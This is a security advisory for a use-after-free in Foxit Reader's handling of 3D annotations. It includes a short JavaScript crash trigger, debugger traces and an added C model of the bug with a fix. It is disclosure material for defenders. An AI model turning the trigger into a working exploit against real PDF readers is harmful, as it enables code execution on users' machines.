Talos Vulnerability Report

TALOS-2023-1837

Foxit Reader 3D Annot use-after-free vulnerability

November 27, 2023
CVE Number

CVE-2023-32616

SUMMARY

A use-after-free vulnerability exists in the way Foxit Reader 12.1.3.15356 handles 3D annotations. Specially crafted JavaScript inside a malicious PDF document can trigger reuse of a previously freed object, which can lead to memory corruption and result in arbitrary code execution. An attacker needs to trick the user into opening the malicious file to trigger this vulnerability. Exploitation is also possible if a user visits a specially crafted, malicious site while the browser plugin extension is enabled.

CONFIRMED VULNERABLE VERSIONS

The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.

Foxit Reader 12.1.3.15356

PRODUCT URLS

Foxit Reader - https://www.foxitsoftware.com/pdf-reader/

CVSSv3 SCORE

8.8 - CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

CWE

CWE-416 - Use After Free

DETAILS

Foxit PDF Reader is one of the most popular PDF document readers. It aims for feature parity with Adobe’s Acrobat Reader. As a complete and feature-rich PDF reader, it supports JavaScript for interactive documents and dynamic forms. JavaScript support exposes an additional attack surface. Foxit Reader uses the V8 JavaScript engine.

JavaScript support in PDF renderers and editors enables dynamic documents that can change based on user input or events. There exists a use-after-free vulnerability in the way Foxit Reader handles 3D annotation objects. This can be illustrated by the following proof-of-concept code:

function f4() {
    // Move focus, change the zoom mode, then navigate to page index 4
    // (the fifth page, since pageNum is 0-based). That page contains a
    // call to delete_pages().
    app.activeDocs[0].getField('txt2').setFocus();
    app.activeDocs[0].zoomType = zoomtype.fitP;
    app.activeDocs[0].pageNum = 4;
}

function f123() {
    app.activeDocs[0].getField('txt1').setFocus();
    f4();
}

function delete_pages() {
    // deletePages() with no arguments uses the default page range; the
    // objects owned by the deleted page, including the 3D annotation
    // object, are freed here.
    app.activeDocs[0].deletePages();
}

In the above code, the function f4 is the important one: it sets pageNum to 4, which navigates to the fifth page of the document (the value of pageNum is 0-based). The fifth page contains a call to the delete_pages function, which calls deletePages(); this in turn frees all the objects associated with the page, including the 3D annotation object. The use-after-free occurs because a reference to that annotation object outlives the deletePages() call and is later used without any validation. We can observe the following in the debugger (with PageHeap enabled):

0:000> g
Breakpoint 0 hit
eax=073feeb0 ebx=073fef1c ecx=0289e7c0 edx=00000002 esi=19011d38 edi=19011dd0
eip=02bc2d39 esp=073fee88 ebp=073feec8 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00200202
FoxitPDFReader!FXJSE_GetClass+0x269:
02bc2d39 ffd1            call    ecx {FoxitPDFReader!safe_vsnprintf+0xf11060 (0289e7c0)}
0:000> g
Breakpoint 0 hit
eax=073fed08 ebx=073fed74 ecx=0289c6c0 edx=00000002 esi=10a39aa0 edi=19182cf0
eip=02bc2d39 esp=073fece0 ebp=073fed20 iopl=0         nv up ei pl nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00200206
FoxitPDFReader!FXJSE_GetClass+0x269:
02bc2d39 ffd1            call    ecx {FoxitPDFReader!safe_vsnprintf+0xf0ef60 (0289c6c0)}  ; <----------- [1]

[....]

0:000> p
eax=04a21534 ebx=107c99bc ecx=189afd40 edx=07500000 esi=107c99b0 edi=0e6df428
eip=00805d68 esp=073fc700 ebp=073feb28 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00200202
FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x41028:
00805d68 6a01            push    1
0:000> p
eax=04a21534 ebx=107c99bc ecx=189afd40 edx=07500000 esi=107c99b0 edi=0e6df428
eip=00805d6a esp=073fc6fc ebp=073feb28 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00200202
FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x4102a:
00805d6a ff5004          call    dword ptr [eax+4]    ds:0023:04a21538=019300e0
0:000> t
eax=04a21534 ebx=107c99bc ecx=189afd40 edx=07500000 esi=107c99b0 edi=0e6df428
eip=019300e0 esp=073fc6f8 ebp=073feb28 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00200202
FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x4f8c90:
019300e0 55              push    ebp
0:000> p
eax=04a21534 ebx=107c99bc ecx=189afd40 edx=07500000 esi=107c99b0 edi=0e6df428
eip=019300e1 esp=073fc6f4 ebp=073feb28 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00200202
FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x4f8c91:
019300e1 8bec            mov     ebp,esp
0:000> p
eax=04a21534 ebx=107c99bc ecx=189afd40 edx=07500000 esi=107c99b0 edi=0e6df428
eip=019300e3 esp=073fc6f4 ebp=073fc6f4 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00200202
FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x4f8c93:
019300e3 56              push    esi
0:000> p
eax=04a21534 ebx=107c99bc ecx=189afd40 edx=07500000 esi=107c99b0 edi=0e6df428
eip=019300e4 esp=073fc6f0 ebp=073fc6f4 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00200202
FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x4f8c94:
019300e4 8bf1            mov     esi,ecx
0:000> p
eax=04a21534 ebx=107c99bc ecx=189afd40 edx=07500000 esi=189afd40 edi=0e6df428
eip=019300e6 esp=073fc6f0 ebp=073fc6f4 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00200202
FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x4f8c96:
019300e6 e8b5fcffff      call    FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x4f8950 (0192fda0)
0:000> p
eax=00000002 ebx=107c99bc ecx=1f2832ac edx=00000001 esi=189afd40 edi=0e6df428
eip=019300eb esp=073fc6f0 ebp=073fc6f4 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00200202
FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x4f8c9b:
019300eb f6450801        test    byte ptr [ebp+8],1         ss:0023:073fc6fc=01
0:000> p
eax=00000002 ebx=107c99bc ecx=1f2832ac edx=00000001 esi=189afd40 edi=0e6df428
eip=019300ef esp=073fc6f0 ebp=073fc6f4 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00200202
FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x4f8c9f:
019300ef 740e            je      FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x4f8caf (019300ff) [br=0]
0:000> p
eax=00000002 ebx=107c99bc ecx=1f2832ac edx=00000001 esi=189afd40 edi=0e6df428
eip=019300f1 esp=073fc6f0 ebp=073fc6f4 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00200202
FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x4f8ca1:
019300f1 6880000000      push    80h
0:000> p
eax=00000002 ebx=107c99bc ecx=1f2832ac edx=00000001 esi=189afd40 edi=0e6df428
eip=019300f6 esp=073fc6ec ebp=073fc6f4 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00200202
FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x4f8ca6:
019300f6 56              push    esi                                             ; <---------- [2]
0:000> dd 189afd40                                                               ; <---------- [3]
189afd40  04996ae4 0889b520 0f8c09a0 0e6df428
189afd50  e0e0e000 00000001 0c0d3418 01000101
189afd60  00000004 00000000 0e926ec0 00000000
189afd70  0c0d337c 0e316f20 193d2d48 00000000
189afd80  00000000 00000000 00000000 00000000
189afd90  00000010 00000000 00000000 00000000
189afda0  0000000a 00000000 00000000 00000000
189afdb0  e0e0e000 00000000 0c168650 00000000
0:000> p
eax=00000002 ebx=107c99bc ecx=1f2832ac edx=00000001 esi=189afd40 edi=0e6df428
eip=019300f7 esp=073fc6e8 ebp=073fc6f4 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00200202
FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x4f8ca7:
019300f7 e8365f8c02      call    FoxitPDFReader!FPDFSCRIPT3D_OBJ_Node__Method_DetachFromCurrentAnimation+0x3b4702 (041f6032) ; <-----------------[4]
0:000> p
eax=00000001 ebx=107c99bc ecx=189afd40 edx=00000001 esi=189afd40 edi=0e6df428
eip=019300fc esp=073fc6e8 ebp=073fc6f4 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00200202
FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x4f8cac:
019300fc 83c408          add     esp,8
0:000> dd 189afd40                                                      ; <-----------------[5]      
189afd40  f0f0f0f0 f0f0f0f0 f0f0f0f0 f0f0f0f0
189afd50  f0f0f0f0 f0f0f0f0 f0f0f0f0 f0f0f0f0
189afd60  f0f0f0f0 f0f0f0f0 f0f0f0f0 f0f0f0f0
189afd70  f0f0f0f0 f0f0f0f0 f0f0f0f0 f0f0f0f0
189afd80  f0f0f0f0 f0f0f0f0 f0f0f0f0 f0f0f0f0
189afd90  f0f0f0f0 f0f0f0f0 f0f0f0f0 f0f0f0f0
189afda0  f0f0f0f0 f0f0f0f0 f0f0f0f0 f0f0f0f0
189afdb0  f0f0f0f0 f0f0f0f0 f0f0f0f0 f0f0f0f0

At [1] above, the method associated with deletePages() is invoked. Further down that call path, a free function is called at [4]; its argument, pushed at [2], comes from the esi register and is the address of the vulnerable buffer. The contents of that buffer are examined at [3], before the free, and again at [5], after it, where PageHeap has overwritten the released block with its 0xf0 fill pattern. The vulnerable buffer is a 3D annotation object, and it is later used without any validation. This can be observed in the debugger at the time of the crash:

0:000> p
eax=10a36c40 ebx=073fdbc4 ecx=189afd40 edx=10a36c40 esi=073fdc3c edi=10a36c40
eip=2abf0cce esp=073fdb34 ebp=073fdbb8 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00200246
U3DBrowser!PlugInMain+0x2dd7e:
2abf0cce e8adfbffff      call    U3DBrowser!PlugInMain+0x2d930 (2abf0880)
0:000> t
eax=10a36c40 ebx=073fdbc4 ecx=189afd40 edx=10a36c40 esi=073fdc3c edi=10a36c40
eip=2abf0880 esp=073fdb30 ebp=073fdbb8 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00200246
U3DBrowser!PlugInMain+0x2d930:
2abf0880 56              push    esi
0:000> pc
eax=019a23d0 ebx=073fdbc4 ecx=189afd40 edx=10a36c40 esi=189afd40 edi=10a36c40
eip=2abf08a3 esp=073fdb14 ebp=073fdbb8 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00200202
U3DBrowser!PlugInMain+0x2d953:
2abf08a3 ffd0            call    eax {FoxitPDFReader!safe_vsnprintf+0x14c70 (019a23d0)}
0:000> pc
eax=01a74c70 ebx=073fdbc4 ecx=0b0bda58 edx=0b468b70 esi=189afd40 edi=10a36c40
eip=2abf08a8 esp=073fdb20 ebp=073fdbb8 iopl=0         nv up ei pl nz ac po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00200212
U3DBrowser!PlugInMain+0x2d958:
2abf08a8 ffd0            call    eax {FoxitPDFReader!safe_vsnprintf+0xe7510 (01a74c70)}
0:000> t
eax=01a74c70 ebx=073fdbc4 ecx=0b0bda58 edx=0b468b70 esi=189afd40 edi=10a36c40
eip=01a74c70 esp=073fdb1c ebp=073fdbb8 iopl=0         nv up ei pl nz ac po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00200212
FoxitPDFReader!safe_vsnprintf+0xe7510:
01a74c70 55              push    ebp
0:000> p
eax=01a74c70 ebx=073fdbc4 ecx=0b0bda58 edx=0b468b70 esi=189afd40 edi=10a36c40
eip=01a74c71 esp=073fdb18 ebp=073fdbb8 iopl=0         nv up ei pl nz ac po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00200212
FoxitPDFReader!safe_vsnprintf+0xe7511:
01a74c71 8bec            mov     ebp,esp
0:000> p
eax=01a74c70 ebx=073fdbc4 ecx=0b0bda58 edx=0b468b70 esi=189afd40 edi=10a36c40
eip=01a74c73 esp=073fdb18 ebp=073fdb18 iopl=0         nv up ei pl nz ac po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00200212
FoxitPDFReader!safe_vsnprintf+0xe7513:
01a74c73 8b4d08          mov     ecx,dword ptr [ebp+8] ss:0023:073fdb20=189afd40
0:000> p
eax=01a74c70 ebx=073fdbc4 ecx=189afd40 edx=0b468b70 esi=189afd40 edi=10a36c40
eip=01a74c76 esp=073fdb18 ebp=073fdb18 iopl=0         nv up ei pl nz ac po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00200212
FoxitPDFReader!safe_vsnprintf+0xe7516:
01a74c76 8b01            mov     eax,dword ptr [ecx]  ds:0023:189afd40=f0f0f0f0
0:000> dd ecx                                                                ;<-------------------- [6]    
189afd40  f0f0f0f0 f0f0f0f0 f0f0f0f0 f0f0f0f0
189afd50  f0f0f0f0 f0f0f0f0 f0f0f0f0 f0f0f0f0
189afd60  f0f0f0f0 f0f0f0f0 f0f0f0f0 f0f0f0f0
189afd70  f0f0f0f0 f0f0f0f0 f0f0f0f0 f0f0f0f0
189afd80  f0f0f0f0 f0f0f0f0 f0f0f0f0 f0f0f0f0
189afd90  f0f0f0f0 f0f0f0f0 f0f0f0f0 f0f0f0f0
189afda0  f0f0f0f0 f0f0f0f0 f0f0f0f0 f0f0f0f0
189afdb0  f0f0f0f0 f0f0f0f0 f0f0f0f0 f0f0f0f0
0:000> p
eax=f0f0f0f0 ebx=073fdbc4 ecx=189afd40 edx=0b468b70 esi=189afd40 edi=10a36c40
eip=01a74c78 esp=073fdb18 ebp=073fdb18 iopl=0         nv up ei pl nz ac po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00200212
FoxitPDFReader!safe_vsnprintf+0xe7518:
01a74c78 5d              pop     ebp
0:000> p
eax=f0f0f0f0 ebx=073fdbc4 ecx=189afd40 edx=0b468b70 esi=189afd40 edi=10a36c40
eip=01a74c79 esp=073fdb1c ebp=073fdbb8 iopl=0         nv up ei pl nz ac po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00200212
FoxitPDFReader!safe_vsnprintf+0xe7519:
01a74c79 ff6010          jmp     dword ptr [eax+10h]  ds:0023:f0f0f100=????????

0:000> g
(7c0.1c8): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=f0f0f0f0 ebx=073fdbc4 ecx=189afd40 edx=0b468b70 esi=189afd40 edi=10a36c40
eip=01a74c79 esp=073fdb1c ebp=073fdbb8 iopl=0         nv up ei pl nz ac po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00210212
FoxitPDFReader!safe_vsnprintf+0xe7519:
01a74c79 ff6010          jmp     dword ptr [eax+10h]  ds:0023:f0f0f100=????????  ;<-------------------- [7]    
0:000> kb
 # ChildEBP RetAddr      Args to Child              
WARNING: Stack unwind information not available. Following frames may be wrong.
00 073fdbb8 2abf5937     01ebc8d3 18b03e78 2abf5937 FoxitPDFReader!safe_vsnprintf+0xe7519
01 073fdc58 0084bd12     00000000 00000000 00000000 U3DBrowser!PlugInMain+0x329e7
02 073fdc78 007cd14d     100f3d60 100f3d60 0c0d3940 FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x86fd2
03 073fdc94 016c43e1     00000000 073fe904 007d55ab FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x840d
04 073fdca0 007d55ab     100f3d60 0c2767a0 00000001 FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x28cf91
05 073fe904 007d4fb7     00000001 00000001 1f281d68 FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x1086b
06 073fe92c 016d1159     00000001 1f281d1c 0c2767a0 FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x10277
07 073fe958 016ccb5f     0ea5a458 0c0d3418 0c0d3930 FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x299d09
08 073fe96c 016c5b69     0c2767a0 1f281db8 0c2767a0 FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x29570f
09 073fe9fc 019478f1     0c2767a0 1f281e68 0c0d3418 FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x28e719
0a 073fea2c 00e00af8     0f8bfa10 1f281e38 ffffffff FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x5104a1
0b 073fea7c 007ccc85     0c2767a0 1f281ef4 100f3f3c FoxitPDFReader!std::basic_ios<char,std::char_traits<char> >::fill+0x2e6258
0c 073feab0 007cca14     00000000 1f281f50 0b04e174 FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x7f45
0d 073feb14 01a69c53     00000000 0f8c5680 073feb38 FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x7cd4
0e 073feb24 502ac7fd     100f3d60 00000000 00000000 FoxitPDFReader!safe_vsnprintf+0xdc4f3
0f 073feb38 019c60f5     0e881c18 100f3d60 073fec48 Signature!PlugInMain+0x6cd
10 073feb4c 0084cc1b     100f3d60 073fec48 0b04e168 FoxitPDFReader!safe_vsnprintf+0x38995
11 073feb6c 0083ddd9     073feba4 073fec48 1f281fd8 FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x87edb
12 073feb9c 007cf916     100f3d60 073fec48 100f3d60 FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x79099
13 073febb0 007d01a1     073fec48 1f281854 0f49c1a0 FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0xabd6
14 073fec10 007d02cd     00000000 00000000 073fec2c FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0xb461
15 073fec20 00f8fbe1     073fec48 073fec84 028d120c FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0xb58d
16 073fec2c 028d120c     073fec48 1f2818c0 19182cf0 FoxitPDFReader!CryptUIWizExport+0x2fe91
17 073fec84 0289c812     19182cf0 00000000 10a39988 FoxitPDFReader!safe_vsnprintf+0xf43aac
18 073fecd8 02bc2d3b     19182cf0 073fed08 073fed00 FoxitPDFReader!safe_vsnprintf+0xf0f0b2
19 073fed20 02da708b     104563c8 10e29785 104563c8 FoxitPDFReader!FXJSE_GetClass+0x26b
1a 073fed88 02da684e     073fedd0 10e29785 073feeac FoxitPDFReader!CFXJSE_Arguments::GetValue+0x1e3c7b
1b 073fee1c 02da6b05     073fee4c 104563c8 073feeac FoxitPDFReader!CFXJSE_Arguments::GetValue+0x1e343e
1c 073fee64 02da698b     073fee7c 00000005 073feeb8 FoxitPDFReader!CFXJSE_Arguments::GetValue+0x1e36f5
1d 073fee80 02fc8d1b     00000005 073feeb8 104563c8 FoxitPDFReader!CFXJSE_Arguments::GetValue+0x1e357b
1e 073feea0 02f64d79     0a9c2339 183d23d5 0000000a FoxitPDFReader!CFXJSE_Arguments::GetValue+0x40590b
1f 073feed8 02f64d79     3f20c76d 3b1865c1 3b186605 FoxitPDFReader!CFXJSE_Arguments::GetValue+0x3a1969
20 073fef04 02f63400     3f20c76d 0a9c21b1 3b1865c1 FoxitPDFReader!CFXJSE_Arguments::GetValue+0x3a1969
21 073fef1c 02f63229     00000000 00000000 00000002 FoxitPDFReader!CFXJSE_Arguments::GetValue+0x39fff0
22 073fef48 02bff59e     104563c8 0a9c2339 3b1865c1 FoxitPDFReader!CFXJSE_Arguments::GetValue+0x39fe19
23 073ff058 02bff0b2     073ff1ec 104563c8 073ff0b4 FoxitPDFReader!CFXJSE_Arguments::GetValue+0x3c18e
24 073ff0e0 02be7da4     073ff1ec 104563c8 1922a7b4 FoxitPDFReader!CFXJSE_Arguments::GetValue+0x3bca2
25 073ff290 02be78a0     073ff32c 1922a7d8 00000000 FoxitPDFReader!CFXJSE_Arguments::GetValue+0x24994
26 073ff2a4 02bc12af     073ff32c 1922a7d8 1f280758 FoxitPDFReader!CFXJSE_Arguments::GetValue+0x24490
27 073ff31c 02bc1be6     1922a7b4 19187b98 1922a7a0 FoxitPDFReader!FXJSE_Runtime_Release+0xd5f
28 073ff358 0283f2f4     0c192bc8 0ae3f50c 19187b98 FoxitPDFReader!FXJSE_ExecuteScript+0x86
29 073ff3bc 028401e0     00000000 073ff470 073ff420 FoxitPDFReader!safe_vsnprintf+0xeb1b94
2a 073ff3d0 02826555     073ff470 073ff420 0b46f020 FoxitPDFReader!safe_vsnprintf+0xeb2a80
2b 073ff3ec 00de1297     0ea65db8 0000000a 073ff41c FoxitPDFReader!safe_vsnprintf+0xe98df5
2c 073ff434 00de02e0     100f3d60 0000000a 073ff470 FoxitPDFReader!std::basic_ios<char,std::char_traits<char> >::fill+0x2c69f7
2d 073ff468 00ddf651     0f8e07a0 0000000a 100f3d60 FoxitPDFReader!std::basic_ios<char,std::char_traits<char> >::fill+0x2c5a40
2e 073ff4bc 00977124     073ff4fc 0000000a 100f3d60 FoxitPDFReader!std::basic_ios<char,std::char_traits<char> >::fill+0x2c4db1
2f 073ff510 009803e1     1f28017c 19488e38 00000003 FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::put+0x74614
30 073ff538 009801fc     00000004 7fffffff 0097ff60 FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::put+0x7d8d1
31 073ff620 04013983     00000432 00000000 00000000 FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::put+0x7d6ec
32 073ff644 0400e327     00000432 00000000 00000000 FoxitPDFReader!FPDFSCRIPT3D_OBJ_Node__Method_DetachFromCurrentAnimation+0x1d2053
33 073ff6b8 0400eb9a     19488e38 004d08aa 00000432 FoxitPDFReader!FPDFSCRIPT3D_OBJ_Node__Method_DetachFromCurrentAnimation+0x1cc9f7
34 073ff6d8 77033cb7     004d08aa 00000432 00000000 FoxitPDFReader!FPDFSCRIPT3D_OBJ_Node__Method_DetachFromCurrentAnimation+0x1cd26a
35 073ff704 770140dc     0400eb66 004d08aa 00000432 USER32!_InternalCallWinProc+0x2b
36 073ff7ec 77013bd3     004d08aa 00000432 00000000 USER32!UserCallWinProcCheckWow+0x26c
37 073ff85c 770139f0     00000332 073ff884 008ed3c4 USER32!DispatchMessageWorker+0x1d3
38 073ff868 008ed3c4     088927a0 088927a0 05e73738 USER32!DispatchMessageW+0x10
39 073ff884 008ed483     05e73738 008ed3f0 ffffffff FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x128684
3a 073ff8a4 0443021e     00000000 05e9fab4 074ff000 FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x128743
3b 073ff8bc 041f5f48     004d0000 00000000 08831f0c FoxitPDFReader!FPDFSCRIPT3D_OBJ_Node__Method_DetachFromCurrentAnimation+0x5ee8ee
3c 073ff908 76c2d109     074ff000 76c2d0f0 073ff974 FoxitPDFReader!FPDFSCRIPT3D_OBJ_Node__Method_DetachFromCurrentAnimation+0x3b4618
3d 073ff918 778f24ed     074ff000 9887f4a8 00000000 KERNEL32!BaseThreadInitThunk+0x19
3e 073ff974 778f24c1     ffffffff 77975e66 00000000 ntdll!__RtlUserThreadStart+0x2b
3f 073ff984 00000000     041f6017 074ff000 00000000 ntdll!_RtlUserThreadStart+0x1b

At [6] above, ecx holds the same pointer, 189afd40, which now refers to a freed allocation. The first dword of the freed object is loaded into eax, and at [7] execution jumps through dword ptr [eax+10h], that is, through what the code treats as the object's virtual function table. Because the freed memory is filled with the 0xf0 pattern, the jump target resolves to f0f0f100, an unmapped address, and the process crashes with an access violation. An attacker who controls the contents of the freed allocation controls the jump target and therefore the flow of execution.

Since additional JavaScript code can be executed between the free and the reuse of the object, the freed memory could be placed under attacker control. With careful memory layout manipulation, this can lead to further memory corruption and ultimately arbitrary code execution.
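To make the sequence above concrete, the following C program is an added example written for this page; it is not Foxit code and does not reproduce Foxit's internals. It models a document whose page owns a 3D annotation object while a second reference to that object (assumed here to be a single active3d pointer standing in for plugin-side state) is kept outside the page. A small arena allocator fills freed blocks with 0xf0 so that the stale read after the free is deterministic and stays inside the program's own buffer, mirroring what PageHeap showed at [5] and [6]. The vulnerable delete path frees the page's annotations and leaves the outside reference dangling; the fixed path invalidates that reference before freeing. All names, structures and layouts are assumptions for illustration.

```c
/* Added example for this advisory, not Foxit code: a dangling reference to a
 * freed annotation object, with a PageHeap-style 0xf0 fill on free so that the
 * stale read is deterministic. All names and layouts are assumptions. */
#include <inttypes.h>
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define ARENA_SIZE 4096
#define MAX_PAGES  8
#define MAX_ANNOTS 4

/* Bump allocator over a static buffer. Each block carries a size header so that
 * ph_free() can poison the whole block, as PageHeap does for released memory.
 * The memory is never unmapped, so reading it after "free" cannot fault here;
 * the real program reads genuinely freed heap instead. */
static _Alignas(16) uint8_t g_arena[ARENA_SIZE];
static size_t g_arena_top;

static void *ph_alloc(size_t n) {
    size_t need = (sizeof(size_t) + n + 15) & ~(size_t)15;
    if (g_arena_top + need > ARENA_SIZE) return NULL;
    size_t *hdr = (size_t *)(g_arena + g_arena_top);
    *hdr = n;
    g_arena_top += need;
    return hdr + 1;
}

static void ph_free(void *p) {
    if (!p) return;
    size_t *hdr = (size_t *)p - 1;
    memset(p, 0xf0, *hdr);      /* the f0f0f0f0 pattern seen at [5] */
}

struct annot3d;
struct annot_ops { int (*kind)(const struct annot3d *); };
struct annot3d { const struct annot_ops *ops; int page; };  /* function table first, like a C++ object */

static int annot3d_kind(const struct annot3d *a) { (void)a; return 3; }
static const struct annot_ops g_annot3d_ops = { annot3d_kind };

struct page { struct annot3d *annots[MAX_ANNOTS]; int n_annots; };
struct doc {
    struct page pages[MAX_PAGES];
    int n_pages;
    struct annot3d *active3d;   /* reference held outside the page (assumed plugin-side state) */
};

static void doc_init(struct doc *d, int n_pages) {
    memset(d, 0, sizeof *d);
    d->n_pages = n_pages;
}

static struct annot3d *doc_add_3d_annot(struct doc *d, int page) {
    if (page < 0 || page >= d->n_pages || d->pages[page].n_annots >= MAX_ANNOTS) return NULL;
    struct annot3d *a = ph_alloc(sizeof *a);
    if (!a) return NULL;
    a->ops = &g_annot3d_ops;
    a->page = page;
    d->pages[page].annots[d->pages[page].n_annots++] = a;
    d->active3d = a;            /* the viewer selects the annotation it is rendering */
    return a;
}

/* Vulnerable: frees the page's annotations but leaves d->active3d dangling,
 * which is the state the advisory observes after deletePages(). */
static void doc_delete_page_vuln(struct doc *d, int page) {
    struct page *p = &d->pages[page];
    for (int i = 0; i < p->n_annots; i++) { ph_free(p->annots[i]); p->annots[i] = NULL; }
    p->n_annots = 0;
}

/* Fixed: the owner invalidates every outstanding reference before freeing. */
static void doc_delete_page_fixed(struct doc *d, int page) {
    struct page *p = &d->pages[page];
    for (int i = 0; i < p->n_annots; i++) {
        if (d->active3d == p->annots[i]) d->active3d = NULL;
        ph_free(p->annots[i]);
        p->annots[i] = NULL;
    }
    p->n_annots = 0;
}

/* The load at "mov eax, dword ptr [ecx]": read the first word of the active
 * object. Returned as an integer rather than called through, because after the
 * vulnerable delete it is fill pattern, not a function table. 0 if none active. */
static uintptr_t doc_read_active_vtable(const struct doc *d) {
    if (!d->active3d) return 0;
    return (uintptr_t)d->active3d->ops;
}

/* Normal use path: dispatch through the object's function table. Safe only
 * while the document still owns the object, so call it after the fixed delete,
 * never after the vulnerable one. Returns -1 when no annotation is active. */
static int doc_use_active(const struct doc *d) {
    if (!d->active3d) return -1;
    return d->active3d->ops->kind(d->active3d);
}

int main(void) {
    struct doc d;
    const uintptr_t fill = UINTPTR_MAX / 0xffu * 0xf0u;   /* 0xf0f0... at this pointer width */

    doc_init(&d, 5);
    doc_add_3d_annot(&d, 4);
    doc_delete_page_vuln(&d, 4);
    printf("vulnerable: stale first word = 0x%" PRIxPTR " (fill pattern: %s)\n",
           doc_read_active_vtable(&d), doc_read_active_vtable(&d) == fill ? "yes" : "no");

    doc_init(&d, 5);
    doc_add_3d_annot(&d, 4);
    doc_delete_page_fixed(&d, 4);
    printf("fixed: doc_use_active() = %d (reference cleared before free)\n", doc_use_active(&d));
    return 0;
}
```

Compiled and run, the vulnerable path reports the word read through the stale pointer as the 0xf0 fill pattern, which is exactly the value the real program then uses as a table base for jmp dword ptr [eax+10h]; the fixed path reports that no active annotation remains, because ownership and the outside reference were reconciled before the memory was released. Under a real allocator, the same program would instead read whatever an attacker managed to place in the recycled block.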

TIMELINE

